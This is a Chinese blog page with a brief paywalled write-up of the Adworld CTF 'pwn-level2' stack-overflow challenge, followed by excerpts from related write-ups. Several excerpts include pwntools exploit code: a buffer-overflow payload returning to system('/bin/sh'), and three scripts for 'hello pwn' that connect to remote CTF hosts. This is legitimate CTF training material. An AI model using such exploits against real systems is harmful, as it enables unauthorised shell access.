【攻防世界pwn-level2】

最新推荐文章于 2024-09-23 20:53:41 发布
原创 最新推荐文章于 2024-09-23 20:53:41 发布 · 356 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #CTF

这篇博客深入解析了攻防世界CTF平台的pwn-level2挑战,通过ida分析32位文件,找到了明显的攻击点——vulnerable_function函数中的栈溢出漏洞。博主揭示了buf与ebp之间的距离以及允许输入的大小,确定了溢出条件。进一步,发现了代码中的system函数地址,并搜寻到sh或bin_sh字符串,为构造shellcode创造了条件。最终,博主设计了利用脚本并成功执行攻击。

下载文件后,首先查看保护

将文件拖入ida 32位,发现函数名明示了攻击点

点进vulnerable_function函数后,发现buf距离ebp有0x88的距离,但是可以读入0x100的大小,确定这是一道栈溢出的题目,溢出点就在此处。

确定溢出点后,开始寻找利用方式,发现代码中给出了system函数,在0x8048320的位置

最低0.47元/天 解锁文章
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1714
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
攻防世界PWN-level2
Deeeelete的博客
11-13 1274
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界 - pwn - level2
qq726232111的博客
03-16 293
A、程序分析 1、使用了system() 2、read() -> 缓冲区溢出 3、 程序包含/bin/sh命令 B、利用分析 1、read(0,ebp-88h) --> payload ebp-88h --- ebp-1h (88hbyte 填充数据) ebp --- ebp+3h (4byte 填充...
攻防世界 Pwn level2
MrTreebook的博客
07-16 651
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
攻防世界pwn level2
2401_83086823的博客
09-23 516
想要溢出buf,就要0x88-0x00+0x04个字节,溢出部分为实现system函数,system(command)的command为/bin/sh,即可拿到shell.2.system返回值为四个字节,为了堆栈平衡,填上四个垃圾字符,再到/bin/sh地址。进入vulnerable_function(这个名字其实就给了提示)buf大小为0x88,read范围为0x100,存在溢出漏洞。查看字符串,看到了system,/bin/sh.1.buf溢出写入system地址。
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3557
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1678
学习pwn开始,慢慢来不要急
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 3547
攻防世界的格式化字符串漏洞利用,简单题
[攻防世界 pwn]——level2
Y_peak的博客
02-18 358
[攻防世界 pwn]——level2 题目地址: https://adworld.xctf.org.cn/ 题目: 32位程序 IDA中, 找到system和 ‘/bin/sh’ 地址进行覆盖 exploit from pwn import * p = remote("111.200.241.244",55083) system_addr = 0x0804845C binsh = 0x0804A024 payload = 'a' * (0x88 + 0x4) + p32(system_addr
攻防世界 pwn新手 level2
kwist_jay的博客
06-14 561
这里我们先下载附件,查看一下文件信息: 32位的i386程序,这里我们用IDA32打开,查看main函数的伪代码 顺藤摸瓜找到输入点buf: 这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出 最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西 初步的payload可以定为 'a'*0x88+'aaaa'+..... 我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_sy...
攻防世界PWN新手题(PWN——level2)
0pt1mus
12-20 983
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该题的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
攻防世界 pwn 新手练习区 level2
ChaoYue_miku的博客
07-05 1097
题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ ** 0、使用file命令查看文件类型,使用checksec查看保护情况,尝试打开文件 ** 32位ELF文件,开启了NX保护和部分地址随机化 (其实checksec就有包含了file的功能) ** 1、使用IDA32 Pro打开文件 ** 题目描述中有提示:面向返回的编程(ROP),所以就要寻找并构造ROP链。 首先查看main()函数 发现有一个vulnerable_function()函数,点进去看一下
pwn 例题level2解析
m0_67423114的博客
04-26 639
下面就是寻找bin/sh了,由于题目较为基础,我们甚至能够直接在源代码中找到/bin/sh,利用它和main函数已存在的system函数,即可凑齐构造payload的全部材料。看开头英文变量以及观察末尾,可知Frame Size大小为0x88,Saved regs大小为0x04,即需要写0x88+0x04个填充后才能到达返回地址。可以看到存在一个缓冲区buf,并且大小为0x88,并且该函数返回了一个read函数,大小为0x100u,双击&buf变量具体查看。通过这种套路,确实获得了/bin/sh的地址!
【愚公系列】2022年01月 攻防世界-简单题-PWN-002(level2)
热门推荐
时光隧道
01-18 3万+
文章目录一、level2二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level2 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level2 checksec --file=level2 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 790
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
攻防世界pwn pwn_level2
qq_44370676的博客
08-14 413
首先下下来的文件查壳以及查保护机制
pwn level2
2201_75387521的博客
12-28 404
先找system函数,发现它的参数待输入,然后shift + Fn + F12 查找特殊字符发现bin_sh,因此希望bin_sh能成为system的参数。其他都是基本的缓冲区溢出。
CTF PWN - ROP ->Payload实例(攻防世界level2
yajuanpi4899的博客
11-04 1869
ROP(Return Oriented Programming)攻击原理:提取反汇编中以ret结尾的代码片段或函数组合实现拓展可写栈空间,组成/bin/sh等常用系统执行命令。 ret指令:将ESP(栈顶地址)中地址弹出至EIP寄存器,代码自动跳转到之前栈顶存放的返回地址,以此构成rop链。(X86)rop链即是基于以上这个简单的原理,在代码空间中寻找以ret结尾的代码片段或函数(代码片段称为Rop gadgets),组合可以实现拓展可写栈空间、写入内存、shell等功能,依靠ret将代码执行权紧握在自己
攻防世界xctf PWN leve2详细讲解,两个地址方法
qq_45200829的博客
08-19 337
bin/sh 字符串有,system函数也有,齐活了。溢出把返回地址改成system的地址,再加/bin/sh参数就能拿到shell了。32位程序,启用的保护不多,启用了NX防护。
攻防世界pwn题hello pwn答案
最新发布
09-24
攻防世界pwn题hello pwn有多份解题代码可作为答案参考: - 代码一: ```python from pwn import * # io = process("./hello_pwn") io = remote("111.200.241.244",65258) io.recvuntil("lets get helloworld for bof") #unk_601068与dword_60106C之间有4字节的空间,所以使用4个A填充 #随后使用预期数据1853186401覆盖dword_60106C payload = b'A' * 4 + p64(1853186401) io.sendline(payload) io.interactive() ``` 此代码中,先建立远程连接,等待特定提示信息,构造包含填充字符和预期数据的`payload`,发送`payload`后进入交互模式 [^2]。 - 代码二: ```python from pwn import * context(os='linux', arch="amd64", log_level="debug") os = remote('61.147.171.105',61286) os.recvuntil('lets get helloworld for bof\n') payload = b'a'*(0x6c-0x68) + p64(1853186401) os.sendline(payload) os.interactive() ``` 该代码先设置上下文信息,建立远程连接,等待特定提示信息,根据内存地址差值构造`payload`,发送`payload`后进入交互模式 [^3]。 - 代码三: ```python from pwn import* p = remote('61.147.171.105',53737) # 将字符串转换为字节对象 str_bytes = 'a'*4 # 构造payload payload = str_bytes.encode() + p64(1853186401) p.recvuntil("lets get helloworld for bof\n") p.sendline(payload) p.interactive() ``` 代码从`pwn`库导入所有功能,创建远程连接对象,构造包含4个`a`的字符串并转换为字节对象,与预期数据拼接成`payload`,等待特定提示信息后发送`payload`,最后进入交互模式 [^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值